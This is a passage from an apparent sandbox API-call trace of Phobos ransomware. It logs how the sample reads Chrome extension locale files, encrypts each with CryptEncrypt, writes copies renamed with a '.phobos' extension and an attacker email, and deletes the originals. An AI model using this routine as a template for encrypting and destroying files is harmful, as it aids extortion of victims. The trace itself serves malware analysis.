lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0151.195] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0151.195] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.195] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.195] CryptDestroyKey (hKey=0xa32d68) returned 1 [0151.195] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.195] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.195] CloseHandle (hObject=0x134) returned 1 [0151.195] CloseHandle (hObject=0x138) returned 1 [0151.195] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json")) returned 1 [0151.196] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.196] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=278) returned 1 [0151.197] CloseHandle (hObject=0x138) returned 1 [0151.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json")) returned 0x2020 [0151.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.197] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.197] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.197] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.197] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.197] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x116, lpOverlapped=0x0) returned 1 [0151.198] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0151.198] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0151.199] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0151.199] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.199] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.199] CryptDestroyKey (hKey=0xa32d68) returned 1 [0151.199] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.199] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.199] CloseHandle (hObject=0x138) returned 1 [0151.199] CloseHandle (hObject=0x134) returned 1 [0151.200] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json")) returned 1 [0151.200] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.201] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=345) returned 1 [0151.201] CloseHandle (hObject=0x134) returned 1 [0151.201] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json")) returned 0x2020 [0151.201] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.201] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.201] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.202] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.202] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.202] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x159, lpOverlapped=0x0) returned 1 [0151.202] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x160, dwBufLen=0x160 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x160) returned 1 [0151.203] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x160, lpOverlapped=0x0) returned 1 [0151.203] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0151.203] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.203] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.203] CryptDestroyKey (hKey=0xa32d68) returned 1 [0151.203] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.204] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.204] CloseHandle (hObject=0x134) returned 1 [0151.204] CloseHandle (hObject=0x138) returned 1 [0151.204] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json")) returned 1 [0151.205] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.205] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=263) returned 1 [0151.205] CloseHandle (hObject=0x138) returned 1 [0151.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json")) returned 0x2020 [0151.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.206] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.206] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.206] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.206] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.206] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x107, lpOverlapped=0x0) returned 1 [0151.207] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0151.207] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0151.208] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0151.208] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.208] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.208] CryptDestroyKey (hKey=0xa32d68) returned 1 [0151.208] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.208] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.208] CloseHandle (hObject=0x138) returned 1 [0151.208] CloseHandle (hObject=0x134) returned 1 [0151.208] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json")) returned 1 [0151.209] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.210] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=264) returned 1 [0151.210] CloseHandle (hObject=0x134) returned 1 [0151.210] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json")) returned 0x2020 [0151.210] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.210] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.210] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.210] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.210] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.210] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x108, lpOverlapped=0x0) returned 1 [0151.213] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0151.213] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0151.214] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0151.214] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.214] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.214] CryptDestroyKey (hKey=0xa32968) returned 1 [0151.214] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.214] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.214] CloseHandle (hObject=0x134) returned 1 [0151.214] CloseHandle (hObject=0x138) returned 1 [0151.214] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json")) returned 1 [0151.215] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.215] GetFileSizeEx (in: hFile=0x138, 